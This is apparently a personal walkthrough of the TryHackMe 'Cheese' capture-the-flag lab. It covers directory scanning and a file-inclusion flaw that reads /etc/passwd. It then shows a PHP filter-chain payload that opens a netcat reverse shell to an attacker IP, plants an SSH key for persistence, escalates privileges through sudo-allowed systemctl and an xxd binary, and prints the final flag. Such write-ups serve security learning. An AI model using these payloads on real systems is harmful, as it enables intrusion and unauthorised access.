## Gobuster Scans
 gobuster dir -u http://cheese.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,xml,js,txt,css,html,cgi,python 
/.html                (Status: 403) [Size: 275]
/.php                 (Status: 403) [Size: 275]
/images               (Status: 301) [Size: 309] [--> http://cheese.thm/images/]
/index.html           (Status: 200) [Size: 1759]
/login.php            (Status: 200) [Size: 834]
/login.css            (Status: 200) [Size: 966]
/users.html           (Status: 200) [Size: 377]
/style.css            (Status: 200) [Size: 705]
/messages.html        (Status: 200) [Size: 448]
/orders.html          (Status: 200) [Size: 380]


## Nmap Scans:
nmap -sV -T4 -Pn 10.10.202.15


## FInds::
http://cheese.thm/messages.html
secret-script.php?file=php://filter/resource=supersecretmessageforadmin:
If you know, you know :D

## Run sql map , we are given new link:
http://cheese.thm/secret-script.php?file=supersecretadminpanel.html
:: CHANGE THE FILE PATH AND WE FIND THE RCE VULNNERABILITY
http://cheese.thm/secret-script.php?file=../../../../../../etc/passwd

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin messagebus:x:103:106::/nonexistent:/usr/sbin/nologin syslog:x:104:110::/home/syslog:/usr/sbin/nologin _apt:x:105:65534::/nonexistent:/usr/sbin/nologin tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin pollinate:x:110:1::/var/cache/pollinate:/bin/false fwupd-refresh:x:111:116:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin sshd:x:113:65534::/run/sshd:/usr/sbin/nologin systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin comte:x:1000:1000:comte:/home/comte:/bin/bash lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false mysql:x:114:119:MySQL Server,,,:/nonexistent:/bin/false 

http://cheese.thm/secret-script.php?file=../../../../../../proc/version
Linux version 5.4.0-174-generic (buildd@bos03-amd64-026) (gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.2)) #193-Ubuntu SMP Thu Mar 7 14:29:28 UTC 2024 

http://cheese.thm/secret-script.php?file=../../../../../../proc/self/cmdline
/usr/sbin/apache2-kstart

## Now we have identified the LFI/RFi(local/remote file inclusion) vulnerability
## WE will use the LFI/RFI wrapping technique.

 INSTALL THE PHP FILTER CHAIN GENERATOR SCRIPT and SAVE IT AS A :: 
 php_filter_chain_generator.py file

::::: NOW we will use the script to get the reverse shell 

1: Run :: python3 php_filter_chain_generator.py --chain '<?php phpinfo(); ?>  '  ON THE TERMINAL
we will get a huge output , paste the put put in the link :: 
http://cheese.thm/secret-script.php?file=output

2Then create a chain using a generator.
Replace the ip address with your own.

# the site to generate the reverse shell code:
https://www.revshells.com/

python3 php_filter_chain_generator.py --chain '<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.21.129.108 4444 >/tmp/f"); ?>' | grep '^php' > phppayload.txt

now we have the Needed output in the phppayload.txt
now we need to get it to the site and  then get a reverse shell


SWITCH ON THE NC listener ON ANOTHER TERMINAL::::

curl -S "http://cheese.thm/secret-script.php?file=$(cat phppayload.txt)::::
here we will load the content in the file and push it to the website

Now we have a nc reverse shell.

# Escalate the privillege

we find the user.txt in the /home/comte
we also find the .ssh file where we locate ::: authorized_keys

Now we will need our own set of key gen:
kali@kali:~/Downloads/TryHackMe/Cheese$ ssh-keygen 

then:: cd ~
cd .ssh
kali@kali:~/.ssh$ ls
id_ed25519  id_ed25519.pub  known_hosts  known_hosts.old

kali@kali:~/.ssh$ cat id_ed25519.pub 
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPcIFRnFRcFEIGcN7Av9zn/PB422k3QjaDyyNjUJP5XH kali@kali
this is the key we will be helped by to log into the ssh


www-data@cheesectf:/home/comte/.ssh$ echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPcIFRnFRcFEIGcN7Av9zn/PB422k3QjaDyyNjUJP5XH kali@kali" > authorized_keys

now we will use the ssh from another terminal 
kali@kali:~/.ssh$ ssh comte@10.10.56.200

::: now we are the comte user
:: cat user.txt
we have our first flag.


comte@cheesectf:/etc/systemd/system$ nano exploit.timer

comte@cheesectf:/etc/systemd/system$ sudo -l

User comte may run the following commands on cheesectf:
    (ALL) NOPASSWD: /bin/systemctl daemon-reload
    (ALL) NOPASSWD: /bin/systemctl restart exploit.timer
    (ALL) NOPASSWD: /bin/systemctl start exploit.timer
    (ALL) NOPASSWD: /bin/systemctl enable exploit.timer
	
comte@cheesectf:/etc/systemd/system$ sudo /bin/systemctl daemon-reload

comte@cheesectf:/etc/systemd/system$ sudo /bin/systemctl restart exploit.timer

comte@cheesectf:/etc/systemd/system$ cd /opt

comte@cheesectf:/opt$ ls
xxd

comte@cheesectf:/opt$ ./xxd "/root/root.txt" | xxd -r
      _                           _       _ _  __
  ___| |__   ___  ___  ___  ___  (_)___  | (_)/ _| ___
 / __| '_ \ / _ \/ _ \/ __|/ _ \ | / __| | | | |_ / _ \
| (__| | | |  __/  __/\__ \  __/ | \__ \ | | |  _|  __/
 \___|_| |_|\___|\___||___/\___| |_|___/ |_|_|_|  \___|


THM{dca75486094810807faf4b7b0a929b11e5e0167c}
